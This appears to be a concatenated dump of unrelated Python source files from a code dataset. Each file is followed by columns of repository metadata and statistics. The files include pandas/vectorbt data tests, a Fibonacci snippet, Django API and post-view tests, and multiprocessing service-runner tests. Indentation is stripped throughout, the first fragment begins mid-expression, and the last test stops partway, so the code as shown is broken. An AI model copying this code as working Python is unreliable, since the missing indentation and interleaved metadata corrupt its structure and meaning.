[0.3745401188473625, 1.3745401188473625],
[0.5986584841970366, 1.5986584841970366],
[0.05808361216819946, 1.05808361216819946],
[0.7080725777960455, 1.7080725777960455],
[0.8324426408004217, 1.8324426408004217]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get()[0],
pd.DataFrame(
[
[0.3745401188473625, 1.3745401188473625],
[0.5986584841970366, 1.5986584841970366],
[0.05808361216819946, 1.05808361216819946],
[0.7080725777960455, 1.7080725777960455],
[0.8324426408004217, 1.8324426408004217]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
def test_indexing(self):
assert MyData.download([0, 1], shape=(5,), columns='feat0').iloc[:3].wrapper == \
MyData.download([0, 1], shape=(3,), columns='feat0').wrapper
assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).iloc[:3].wrapper == \
MyData.download([0, 1], shape=(3, 3), columns=['feat0', 'feat1', 'feat2']).wrapper
assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])['feat0'].wrapper == \
MyData.download([0, 1], shape=(5,), columns='feat0').wrapper
assert MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])[['feat0']].wrapper == \
MyData.download([0, 1], shape=(5, 1), columns=['feat0']).wrapper
# ############# updater.py ############# #
class TestDataUpdater:
def test_update(self):
data = MyData.download(0, shape=(5,), return_arr=True)
updater = vbt.DataUpdater(data)
updater.update()
assert updater.data == data.update()
assert updater.config['data'] == data.update()
def test_update_every(self):
data = MyData.download(0, shape=(5,), return_arr=True)
kwargs = dict(call_count=0)
class DataUpdater(vbt.DataUpdater):
def update(self, kwargs):
super().update()
kwargs['call_count'] += 1
if kwargs['call_count'] == 5:
raise vbt.CancelledError
updater = DataUpdater(data)
updater.update_every(kwargs=kwargs)
for i in range(5):
data = data.update()
assert updater.data == data
assert updater.config['data'] == data
| 40.067016
| 114
| 0.481131
| 3,400
| 38,264
| 5.302353
| 0.047059
| 0.043932
| 0.059907
| 0.063235
| 0.882072
| 0.863157
| 0.858553
| 0.849512
| 0.84696
| 0.842467
| 0
| 0.343158
| 0.401474
| 38,264
| 954
| 115
| 40.109015
| 0.444022
| 0.000549
| 0
| 0.631974
| 0
| 0
| 0.035958
| 0
| 0
| 0
| 0
| 0
| 0.071888
| 1
| 0.011803
| false
| 0
| 0.006438
| 0
| 0.026824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
57a8a94ab86edc3e4b4b8db25ceddf36b46398b5
| 86
|
py
|
Python
|
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
MARG Python Assignment 1 Answers/question3.py
|
StuartSul/MARG-Python-Study-2020-Assignments
|
11530c7213c0e9bd781a5f11802346003b6ec543
|
[
"CNRI-Python"
] | null | null | null |
f = [0, 1, 0]
while f[2] < 10**8:
print(f[2])
f[0:2] = f[1:]
f[2] = f[1] + f[0]
| 14.333333
| 20
| 0.372093
| 23
| 86
| 1.391304
| 0.347826
| 0.1875
| 0.1875
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 0.27907
| 86
| 5
| 21
| 17.2
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
57b07c5e02096bf152127f2be6908d399c4aff75
| 29
|
py
|
Python
|
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | 3
|
2016-09-28T04:10:59.000Z
|
2019-04-20T21:41:35.000Z
|
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | null | null | null |
python_i2c_mpu9250/__init__.py
|
danrs/python_i2c_mpu9250
|
a0e222b9a0024db3999325c5db3aff6126c20476
|
[
"MIT"
] | 1
|
2019-10-03T15:18:26.000Z
|
2019-10-03T15:18:26.000Z
|
from .mpu9250 import mpu9250
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.32
| 0.137931
| 29
| 1
| 29
| 29
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
57fd99c1478b23754ecc28fc342870429574f193
| 60
|
py
|
Python
|
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | 2
|
2019-05-26T15:09:34.000Z
|
2021-09-12T08:01:23.000Z
|
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | null | null | null |
python/main.py
|
robotlightsyou/test
|
015f13943fc402d8ce86c5f6d2f5a7d032b3340a
|
[
"MIT"
] | 1
|
2021-04-11T20:28:21.000Z
|
2021-04-11T20:28:21.000Z
|
def __main__(*args, **kwds):
print('MAIN!', args, kwds)
| 20
| 30
| 0.6
| 8
| 60
| 4
| 0.625
| 0.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 60
| 2
| 31
| 30
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
17b828b4e6c2e1caa3061063e501a6409d9e05bc
| 59
|
py
|
Python
|
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
bettermaxtools/__init__.py
|
thomascswalker/bettergameexporter
|
4db3683a599d523e28c2f93bdcac889277130153
|
[
"MIT"
] | null | null | null |
from .maxruntime import rt
from .maxruntime import maxhwnd
| 19.666667
| 31
| 0.830508
| 8
| 59
| 6.125
| 0.625
| 0.571429
| 0.816327
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 32
| 29.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa077095aba849967e942214a08b87bd20c785e5
| 189
|
py
|
Python
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 13
|
2020-05-29T15:32:22.000Z
|
2022-01-20T12:38:44.000Z
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 16
|
2020-06-02T15:14:14.000Z
|
2021-07-29T10:04:55.000Z
|
src/core/bot/models/__init__.py
|
xcad2k/disrapid
|
44aef95d181cc9cddfddfba2b03517209efe4481
|
[
"MIT"
] | 4
|
2020-06-02T15:06:27.000Z
|
2021-09-29T23:56:43.000Z
|
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
from .guild import * # noqa: 401
from .youtube import * # noqa: 401
from .welcome import * # noqa: 401
| 27
| 55
| 0.740741
| 25
| 189
| 5.52
| 0.44
| 0.217391
| 0.282609
| 0.246377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057325
| 0.169312
| 189
| 6
| 56
| 31.5
| 0.821656
| 0.153439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa0eba0ef1124d7389b37cd578089cc5c0174daf
| 1,210
|
py
|
Python
|
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
tug_diagnosis/tug_diagnosis/scripts/pymbd/benchmark/tug_description_parser/observer.py
|
annajohny/sdp
|
2f66e226fc335ae357001d07fbc74d30ab469509
|
[
"BSD-3-Clause"
] | null | null | null |
OBSERVERS = {}
def generate_model_parameter(config,
topics_published_from_nodes,
topics_subscribed_from_nodes,
nodes_publish_topics,
nodes_subscribe_topics):
# return OBSERVERS[config['type']].generate_model_parameter(config,
# topics_published_from_nodes,
# topics_subscribed_from_nodes,
# nodes_publish_topics,
# nodes_subscribe_topics)
return OBSERVERS[config.type].generate_model_parameter(config,
topics_published_from_nodes,
topics_subscribed_from_nodes,
nodes_publish_topics,
nodes_subscribe_topics)
def decrypt_resource_info(obs):
return OBSERVERS[obs[0]].decrypt_resource_info(obs[1])
| 52.608696
| 93
| 0.424793
| 78
| 1,210
| 6.076923
| 0.269231
| 0.113924
| 0.139241
| 0.177215
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0
| 0.003546
| 0.533884
| 1,210
| 22
| 94
| 55
| 0.836879
| 0.332231
| 0
| 0.461538
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0
| 0.153846
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
aa28607309d011843431efbfabaaf6670fd2b043
| 8,644
|
py
|
Python
|
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
be/src/dsp_be/routes/test/stars_test.py
|
koadjunky/dsp-manager
|
fb181c184aaca393a036556c54eb64bd89c75100
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
from unittest.mock import ANY
import pytest
from httpx import AsyncClient
from requests import Response
async def create_star(
client: AsyncClient,
name: str,
imports: List[str] = None,
exports: List[str] = None,
) -> Response:
imports_list = imports if imports is not None else []
exports_list = exports if exports is not None else []
request = {"name": name, "imports": imports_list, "exports": exports_list}
return await client.post("/dsp/api/stars/", json=request)
async def read_star(client: AsyncClient, name: str) -> Response:
return await client.get(f"/dsp/api/stars/{name}")
async def update_star(
client: AsyncClient,
id: str,
name: str,
imports: List[str] = None,
exports: List[str] = None,
) -> Response:
imports_list = imports if imports is not None else []
exports_list = exports if exports is not None else []
request = {"id": id, "name": name, "imports": imports_list, "exports": exports_list}
return await client.put("/dsp/api/stars/", json=request)
async def delete_star(client: AsyncClient, name: str) -> Optional[Response]:
response = await read_star(client, name)
if response.status_code != 200:
return None
star = response.json()
if "id" not in star:
return None
id_ = star["id"]
return await delete_star_id(client, id_)
async def delete_star_id(client: AsyncClient, id_: str) -> Response:
return await client.delete(f"/dsp/api/stars/{id_}")
TEST_STAR = "Test Star"
TEST_STAR_1 = "Other Star"
@pytest.mark.anyio
async def test_create_star(async_client: AsyncClient) -> None:
response = await create_star(async_client, TEST_STAR)
assert response.status_code == 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": [],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_create_star_duplicate_name(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR, imports=["iron_ingot"])
response = await create_star(async_client, TEST_STAR)
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": ["iron_ingot"],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_create_star_empty_name(async_client: AsyncClient) -> None:
response = await create_star(async_client, "")
assert response.status_code != 200
@pytest.mark.anyio
async def test_create_star_import_export(async_client: AsyncClient) -> None:
response = await create_star(
async_client, TEST_STAR, imports=["iron_ingot"], exports=["copper_ingot"]
)
assert response.status_code == 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": ["iron_ingot"],
"exports": ["copper_ingot"],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_create_star_wrong_imports(async_client: AsyncClient) -> None:
response = await create_star(async_client, TEST_STAR, imports=["bad_resource"])
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code != 200
@pytest.mark.anyio
async def test_create_star_wrong_exports(async_client: AsyncClient) -> None:
response = await create_star(async_client, TEST_STAR, exports=["bad_resource"])
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code != 200
@pytest.mark.anyio
async def test_update_star(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
id_ = response.json()["id"]
response = await update_star(
async_client,
id=id_,
name=TEST_STAR_1,
imports=["iron_ingot"],
exports=["copper_ingot"],
)
assert response.status_code == 200
response = await read_star(async_client, TEST_STAR_1)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR_1,
"imports": ["iron_ingot"],
"exports": ["copper_ingot"],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_update_star_duplicate_name(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR_1)
await create_star(async_client, TEST_STAR, imports=["iron_ingot"])
response = await read_star(async_client, TEST_STAR)
id_ = response.json()["id"]
response = await update_star(
async_client,
id=id_,
name=TEST_STAR_1,
imports=["iron_ingot"],
exports=["copper_ingot"],
)
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": ["iron_ingot"],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
response = await read_star(async_client, TEST_STAR_1)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR_1,
"imports": [],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_update_star_empty_name(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
id_ = response.json()["id"]
response = await update_star(
async_client, id=id_, name="", imports=["iron_ingot"], exports=["copper_ingot"]
)
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": [],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_update_star_wrong_imports(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
id_ = response.json()["id"]
response = await update_star(
async_client, id=id_, name=TEST_STAR, imports=["bad_resource"], exports=[]
)
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": [],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_update_star_wrong_exports(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
id_ = response.json()["id"]
response = await update_star(
async_client, id=id_, name=TEST_STAR, imports=[], exports=["bad_resource"]
)
assert response.status_code != 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
assert response.json() == {
"name": TEST_STAR,
"imports": [],
"exports": [],
"planets": [],
"trade": {},
"id": ANY,
}
@pytest.mark.anyio
async def test_delete_star(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
id_ = response.json()["id"]
response = await delete_star_id(async_client, id_)
assert response.status_code == 200
response = await read_star(async_client, TEST_STAR)
assert response.status_code != 200
@pytest.mark.anyio
async def test_delete_not_existing_star(async_client: AsyncClient) -> None:
await create_star(async_client, TEST_STAR)
response = await read_star(async_client, TEST_STAR)
assert response.status_code == 200
id_ = response.json()["id"]
response = await delete_star_id(async_client, id_)
assert response.status_code == 200
response = await delete_star_id(async_client, id_)
assert response.status_code == 200
| 31.318841
| 88
| 0.656293
| 1,072
| 8,644
| 5.024254
| 0.059701
| 0.112328
| 0.119755
| 0.116413
| 0.908652
| 0.882473
| 0.882287
| 0.861121
| 0.853138
| 0.851281
| 0
| 0.014074
| 0.219112
| 8,644
| 275
| 89
| 31.432727
| 0.783852
| 0
| 0
| 0.737288
| 0
| 0
| 0.075659
| 0.002429
| 0
| 0
| 0
| 0
| 0.15678
| 1
| 0
| false
| 0
| 0.135593
| 0
| 0.165254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa38c80a039eda14e2aee4f80eb3dbb9dc75ab8f
| 212
|
py
|
Python
|
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
spike_swarm_sim/utils/__init__.py
|
r-sendra/SpikeSwarmSim
|
a5bd71cb93df0963588640c5d44b3891fa07457c
|
[
"MIT"
] | null | null | null |
from .utils import *
from .graph_utils import *
from .math_utils import *
from .alg_utils import *
from .activations import *
from .initializers import *
from .decorators import *
from .exceptions import *
| 26.5
| 28
| 0.745283
| 27
| 212
| 5.740741
| 0.37037
| 0.451613
| 0.387097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179245
| 212
| 8
| 29
| 26.5
| 0.890805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4f7a784eb827d80938a5bbd769768dc96f9e33d
| 6,494
|
py
|
Python
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 3
|
2018-05-06T19:00:55.000Z
|
2018-06-05T09:03:34.000Z
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 10
|
2018-03-15T13:14:59.000Z
|
2021-09-21T13:26:10.000Z
|
test/test_service_runner.py
|
franagustin/applauncher
|
963a5710303c745c6b0b7cecd911eec53586cc3d
|
[
"Apache-2.0"
] | 2
|
2018-05-24T17:30:20.000Z
|
2021-09-06T22:03:31.000Z
|
from applauncher.service_runner import ProcessServiceRunner
from multiprocessing import Manager
import time
import signal
# Just a dummy process
def handler(signum, frame):
print("HANDLER")
def infinito():
try:
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGINT, handler)
except Exception as e:
print(e)
while True:
time.sleep(1)
# The tests
class TestClass:
def test_run(self):
r = ProcessServiceRunner()
r.add_service(name="A", function=infinito)
r.add_service(name="B", function=infinito)
r.add_service(name="C", function=infinito)
r.add_service(name="D", function=infinito)
assert len(r.running_services) == 4
# In the beginning everything is stopeed
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is False
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is False
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is False
r.run()
# Now everything should be running
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is True
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is True
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is True
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is True
r.kill()
def test_shutdown(self):
r = ProcessServiceRunner()
r.add_service(name="A", function=infinito)
r.add_service(name="B", function=infinito)
r.add_service(name="C", function=infinito)
r.add_service(name="D", function=infinito)
assert len(r.running_services) == 4
# In the beginning everything is stopeed
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is False
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is False
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is False
r.run()
# Now everything should be running
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is True
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is True
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is True
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is True
r.shutdown(grace_time=2)
time.sleep(3)
# Now everything should be stopped
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is False
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is False
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is False
def test_kill(self):
r = ProcessServiceRunner()
r.add_service(name="A", function=infinito)
r.add_service(name="B", function=infinito)
r.add_service(name="C", function=infinito)
r.add_service(name="D", function=infinito)
assert len(r.running_services) == 4
# In the beginning everything is stopeed
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is False
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is False
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is False
r.run()
# Now everything should be running
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is True
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is True
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is True
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is True
r.kill()
# Now everything should be stopped
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
name, process = r.running_services[1]
assert name == "B"
assert process.is_alive() is False
name, process = r.running_services[2]
assert name == "C"
assert process.is_alive() is False
name, process = r.running_services[3]
assert name == "D"
assert process.is_alive() is False
def test_wait(self):
"""Check that we are actually waiting for the service to end"""
r = ProcessServiceRunner()
manager = Manager()
d = manager.dict()
d["value"] = 0
def wait_function(data):
data["value"] = 1
time.sleep(1)
r.add_service(name="A", function=wait_function, args=(d,))
assert d["value"] == 0
r.run()
assert len(r.running_services) == 1
r.wait()
assert d["value"] == 1
def test_shutdown_no_grace_time(self):
r = ProcessServiceRunner()
r.add_service(name="A", function=infinito)
assert len(r.running_services) == 1
name, process = r.running_services[0]
assert name == "A"
assert process.is_alive() is False
r.run()
assert process.is_alive() is True
r.shutdown(grace_time=1)
assert process.is_alive() is False
| 33.647668
| 71
| 0.596089
| 832
| 6,494
| 4.532452
| 0.098558
| 0.080615
| 0.16123
| 0.185627
| 0.849642
| 0.849642
| 0.828958
| 0.822328
| 0.821268
| 0.821268
| 0
| 0.010303
| 0.297505
| 6,494
| 192
| 72
| 33.822917
| 0.816309
| 0.05713
| 0
| 0.810976
| 0
| 0
| 0.012115
| 0
| 0
| 0
| 0
| 0
| 0.457317
| 1
| 0.04878
| false
| 0
| 0.02439
| 0
| 0.079268
| 0.012195
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a4f820a6cbb3912a0aa4735725461971be9e975f
| 9,713
|
py
|
Python
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | 3
|
2022-03-05T03:48:23.000Z
|
2022-03-05T03:54:22.000Z
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | 2
|
2022-03-03T00:12:11.000Z
|
2022-03-04T02:44:01.000Z
|
cmput_404_project/service/tests/tests_post.py
|
3662/cmput404-project
|
cedcff900d010c546cb6f5d27635c1406dc1cd8f
|
[
"Apache-2.0"
] | null | null | null |
import uuid
import json
from django.test import TestCase, Client
from django.core.exceptions import ObjectDoesNotExist
from social_distribution.models import Author, Post
from .helper import create_dummy_authors, create_dummy_post, create_dummy_posts
from service.models import ServerNode
class PostViewTestCase(TestCase):
def setUp(self):
ServerNode.objects.create(host='testserver', is_local=True)
create_dummy_authors(1)
def test_get(self):
c = Client()
author = Author.objects.get(username='test0')
# test with friends-only post
create_dummy_post(author, visibility='FRIENDS', content_type='text/plain')
post = Post.objects.get(title='Test Post')
response = c.get(f'/service/authors/{author.id}/posts/{post.id}/')
self.assertEqual(response.status_code, 404)
post.delete()
create_dummy_post(author, visibility='PUBLIC', content_type='text/plain')
post = Post.objects.get(title='Test Post')
# test with invalid post id
response = c.get(f'/service/authors/{author.id}/posts/invalid_post_id')
self.assertEqual(response.status_code, 404)
# test with valid post id
response = c.get(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertDictEqual(response.json(), post.get_detail_dict())
def test_head(self):
c = Client()
author = Author.objects.get(username='test0')
visibility = 'PUBLIC'
create_dummy_post(author, visibility=visibility, content_type='text/plain')
post = Post.objects.get(title='Test Post')
# test with valid post id
response = c.head(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'')
def test_post(self):
c = Client()
author = Author.objects.get(username='test0')
visibility = 'PUBLIC'
create_dummy_post(author, visibility=visibility, content_type='text/plain')
post = Post.objects.get(title='Test Post')
# test without being signed in
response = c.post(f'/service/authors/{author.id}/posts/{post.id}')
self.assertEqual(response.status_code, 403)
c.login(username=author.username, password='temporary')
before_published = post.published
before_modified = post.modified
# post with valid data
data = {
'title': 'Updated Test Post Title',
'description': 'Updated Test Post description',
'content_type': 'text/plain',
'content': 'Updated test post content',
'categories': 'updated,test,post,categories',
'visibility': 'PUBLIC',
}
response = c.post(f'/service/authors/{author.id}/posts/{post.id}', data)
self.assertEqual(response.status_code, 200)
post = Post.objects.get(id=post.id) # get updated post
# test timestamps
self.assertTrue(before_published == post.published)
self.assertTrue(before_modified < post.modified)
# test updated fields
